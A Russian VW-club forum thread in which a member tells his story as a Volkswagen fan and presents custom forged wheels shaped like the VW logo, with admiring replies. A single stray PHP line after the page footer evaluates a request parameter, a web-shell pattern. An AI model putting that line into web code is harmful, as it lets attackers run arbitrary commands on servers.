+ Ответить в теме
Страница 1 из 10 1 2 3 ... ПоследняяПоследняя
Показано с 1 по 10 из 99

Тема: Новогодний подарок ФАНАТАМ марки VW. Нормальным водителям смотреть не рекомендуется!!


  1. #1
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901

    Exclamation Новогодний подарок ФАНАТАМ марки VW. Нормальным водителям смотреть не рекомендуется!!

    Новогодняя сказка:

    Давным давно когда я был маленьким и зимой выпадало так много снега что сугробы были выше моего роста, в те годы мой папа выписывал журнал «За рулем» и в нем я впервые увидел черно-белые фотографии иномарок на диковинных литых колесах, тогда я совершил для себя открытие: оказывается колеса предназначены не только для того чтобы катиться по дороге или полю, но ещё и для красоты!!!!! И я сразу же с помощью синей изоленты начал экспериментировать со спицами своего велосипеда. Этот «тюнинг» значительно увеличил мой авторитет и популярность среди наших деревенских пацанов и девченок))))) Некоторые из них тупо скопировали мой «дизайн», а некоторые «заказали» у меня индивидуальные «проекты»…

    Потом пришло моё время отдать долг Родине и я пошел служить в Армию. В нашей части служило несколько офицеров и прапорщиков которые ранее проходили службу в Группе советских войск в Германии [потом переименованную в Западную группу войск], все они пригнали себе немецкие автомобили и как-то так получилось что среди них больше всего было автомобилей марки VW. Я был поражен совершенством их конструкции, высоким качеством, динамическими характеристиками и управляемостью, а также лаконичным дизайном! Тогда я стал почитателем марки VW. И тогда же вспоминая свои детские эксперименты с велосипедными колесами я подумал о том что логотип VW очень сильно похож на колесо с четырьмя спицами и было бы очень стильно сделать такие же литые диски для автомобиля [благодаря круглой форме и подчеркнутой объемности сходство логотипа VW с колесом достаточно очевидно – наверняка многие из вас думали об этом]. Но в те времена я с очень большим трудом накопил на ржавый ВАЗ-2101 и поэтому даже не мог мечтать о том что когда либо смогу заработать на такой совершенный и безумно дорогой автомобиль Volkswagen и соответственно идея с колесами в форме логотипа VW так и осталась нереализованной(((



    Прошло много лет. Начала расти цена на нефть и заработная плата! И в 2006 году я купил Golf GTI Mk5. Естественно начался процесс тюнинга: чип, впуск, выпуск, амортизаторы и пружины … Но когда дошла очередь до колес то я очень долго не мог выбрать вариант который бы меня полностью устраивал… После долгих размышлений я пришел к выводу что хочу чтобы по колесам автомобиль однозначно идентифицировался как «ДжиТиАй», поэтому нужны колеса с дизайном аналогичным штатным Денверам и Детройтам, только более прочные и легкие, т.е. кованые. И в начале 2008 года я разработал чертежи таких кованых колес, их мелкосерийное производство удалось организовать в Туле на производственных мощностях компании «МагАлТек», а позже из-за банкротства «МагАлТек-а» пришлось перенести производство в Ступино [СМК] и Тольятти [«Slik»]. Вначале были освоены колеса диаметром 17 дюймов, но мой лучший друг Алексей ник: КИБАЛЬЧИШЬ поддержал меня и помог разработать и запустить ещё в производство данные кованые колеса диаметром 18 и 19 дюймов. С коммерческой точки зрения это был полностью убыточный проект, так как добавочная стоимость ничтожна мала по сравнению с затратами на освоение новых типоразмеров. Но каждый раз когда смотрю на эту фотографию я получаю такую колоссальную дозу удовольствия что это трудно выразить словами [фанаты VW меня поймут] поэтому мне не жалко потраченных денег: http://www.gti-club.ru/forum/showthread.php?t=4898




    А уже в августе 2008 года я посетил Московский международный автомобильный салон и увидел кованные колеса "звезды" изготовленные по заказу Чичваркина для его ГАЗ-21. Естественно я сразу вспомнил про свою идею с колесами в форме логотипа VW и начал делать предварительные расчеты нового колеса. Но спустя нескольких дней по ряду причин мне пришлось расстаться с любимым GTI и приобрести Шкоду Октавию. Поэтому красивая идея в очередной раз осталась не реализованной(((((




    Шкода Октавия очень хорошая машина, по нескольким параметрам она даже превосходит Гольф. Но не смотря на эти достоинства я очень сильно скучал по Фольксвагену. Поэтому в конце 2011 года решил снова купить себе Гольф и первым делом начал с … проектирования для него самых правильных для VW колес))) В настоящий момент практически полностью завершены проектные работы и выбрана самая лучшая производственная площадка – компания «Solomon Alsberg» http://www.sa-group.biz/ , а также предоплачено написание управляющих программ для станков с ЧПУ. Для того чтобы произвести фурор на VW-фестивале в мае 2012 и любом другом месте где появится автомобиль на данных колесах, окончательные чертежи я пока держу в тайне, ниже публикую схематичные макеты колеса и эскизы автомобилей на данных колесах. Эти картинки позволят вам оценить идею колес. Предварительно я показывал эти картинки нескольким фанатам марки VW и они очень положительно оценили эти колеса, но если у кого то из вас будут отрицательные оценки, пожалуйста, пишите не стесняйтесь – прочту их с большим вниманием и если критика будет конструктивной постараюсь исправиться.


























    А теперь о самом главном – О НОВОГОДНЕМ ПОДАРКЕ :
    Недавно мне стало понятно что по финансовым причинам я вынужден отложить покупку Гольфа на год – два, но при этом я решил что больше не буду откладывать реализацию идеи колес в виде логотипа VW и подарю её любому настоящему фанату марки VW. Т.е. мое желание увидеть эти колеса готовыми "в металле" и установлеными на Гольфе [или другой модели Volkswagen] перевешивает желание быть первым обладателем данных колес и я конечно с некоторым сожалением уступлю эту почетную роль любому из вас кто также как и я неравнодушен к буквам «VW». Идеальный вариант если этот счастливчик не только порадует себя и всех любителей марки VW на Московском VW-фестивале, но ещё и поедет на Worthersee 2012 чтобы показать что мы можем тюнинговать Volkswagen даже круче чем на его родине!!!!!!! На чертежах я присвоил этим колесам рабочее обозначение «KonigVW» :-)

    Поздравляю всех с Новым 2012 годом!!!!!
    Последний раз редактировалось crazy_engineer; 03.01.2012 в 00:25.

  2. #2
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Шедеврально !


    песок сыпется....не останавливайтесь на достигнутом !

  3. #3
    GTI-Racing TishONE is on a distinguished road Аватар для TishONE
    Регистрация
    20.07.2008
    Откуда
    MSK
    Машина
    vRS FL 2011 (Race Blue)
    Сообщений
    1,139
    интересно, как на РСке смотреться будут?:_)
    MK2 GTI EV - ПРОДАНА.
    Hyundai Sonata 2.0 - ПРОДАНА.
    MK4 GTI AUM - ПРОДАНА.
    Skoda Octavia vRS - ПРОДАНА.
    BMW 116i - ПРОДАНА.
    Land Rover Discovery 4 HSE - комфорт превыше всего)

  4. #4
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    Цитата Сообщение от BON Посмотреть сообщение
    Шедеврально !
    Олег, большое спасибо за оценку!!!!!

    И ещё большее спасибо за консультации и поддержку когда я только размышлял браться или нет за этот сложный проект!!!!!!!!
    Без твоего одобрения я бы не рискнул начинать, поэтому можно сказать что ты тоже причастен к созданию этих колес!!!

    Добавлено через 5 минут
    Цитата Сообщение от TishONE Посмотреть сообщение
    интересно, как на РСке смотреться будут?:_)
    примерно также как например когда ставят на Golf колеса от Bentley





    Последний раз редактировалось crazy_engineer; 02.01.2012 в 19:53. Причина: Добавлено сообщение

  5. #5
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    на Шкоде не будут смотреца, ИМХО я бы расценил это как плохой вкус........ раз диски предлагаются Вадиком в одном комплекте и будут специально изготовлены для ценителя, то Вы меня уж извините, но это тока VW.
    Это вообще гарантирует любому владельцу VW быть намбо уан ! Причем везде на улице, на тусе и тем более на VW Fest !
    песок сыпется....не останавливайтесь на достигнутом !

  6. #6
    Супер Модератор ™B®embo™ is just really nice ™B®embo™ is just really nice ™B®embo™ is just really nice ™B®embo™ is just really nice Аватар для ™B®embo™
    Регистрация
    01.02.2007
    Откуда
    Москва
    Машина
    Mk4 R32 DSG Black Series / Mk4 GTI
    Сообщений
    4,234
    Колеса СЕКС :spit: Отличная идея, отличный проект! Олежка правильно сказал намбо уан, кому то точно повезет, на фесте не будет отбоя от пилоток и прессы!

    Жду не дожусь увидеть в реале!!!
    Вадик успехов тебе!!!
    Техническое бюро moJotec

    "Продают лошадиные силы, а выигрывает момент!!!"

    Wolf in sheep's clothing;)

  7. #7
    ----- звезды , однозначно пойдут на 5 или 6 гольф , а фольксваген- тока на гольф- 4 . И очень правильно , что эти диски -Обязаны быть увиденными в Европе

  8. #8
    Жгун Года 2010 КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough Аватар для КИБАЛЬЧИШЬ
    Регистрация
    14.04.2008
    Сообщений
    2,346
    Если к лету куплю таки какой-нибудь овощногй VW, закажу эти мегадиски.
    Вадим как всегда - бесподобен.
    Последний раз редактировалось КИБАЛЬЧИШЬ; 02.01.2012 в 22:32.

  9. #9
    GTI-Racing Kamich is just really nice Kamich is just really nice Kamich is just really nice Kamich is just really nice Аватар для Kamich
    Регистрация
    23.06.2010
    Откуда
    Mascwa
    Машина
    FE V, ранее GTI 5 MT&DSG
    Сообщений
    1,666
    ты забыл указать цену реализации от идеи до кругляшей на колесах.
    А так да.. я, когда увидел этот твой проект пытался примерно просчитать как ты меняешь толщину спиц для полной балансировки колес- очень нелегкая задача. Если это действительно возможно- это шедевр! Жаль, что сильвер тебе для реализации не подошел =) Он ждет свой вариант! =)
    In a world that's digital, we choose to be ANALOG.

  10. #10
    Цитата Сообщение от Kamich Посмотреть сообщение
    ты забыл указать цену реализации от идеи до кругляшей на колесах.
    А так да.. я, когда увидел этот твой проект пытался примерно просчитать как ты меняешь толщину спиц для полной балансировки колес- очень нелегкая задача. Если это действительно возможно- это шедевр! Жаль, что сильвер тебе для реализации не подошел =) Он ждет свой вариант! =)
    ---- Cерег , цена не приличная . Это штучное производство , в единичных экземплярах это очень не выгодно и дорого

+ Ответить в теме
Страница 1 из 10 1 2 3 ... ПоследняяПоследняя

Похожие темы

  1. Ответов: 6
    Последнее сообщение: 02.04.2024, 02:45
  2. Зимняя резина по нормальным ценам
    от kolmar в разделе Шины, диски
    Ответов: 19
    Последнее сообщение: 01.04.2024, 11:50
  3. Ответов: 5
    Последнее сообщение: 08.01.2014, 13:03
  4. Ответов: 2
    Последнее сообщение: 07.01.2010, 22:23
  5. Ответов: 5
    Последнее сообщение: 16.09.2009, 19:23

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}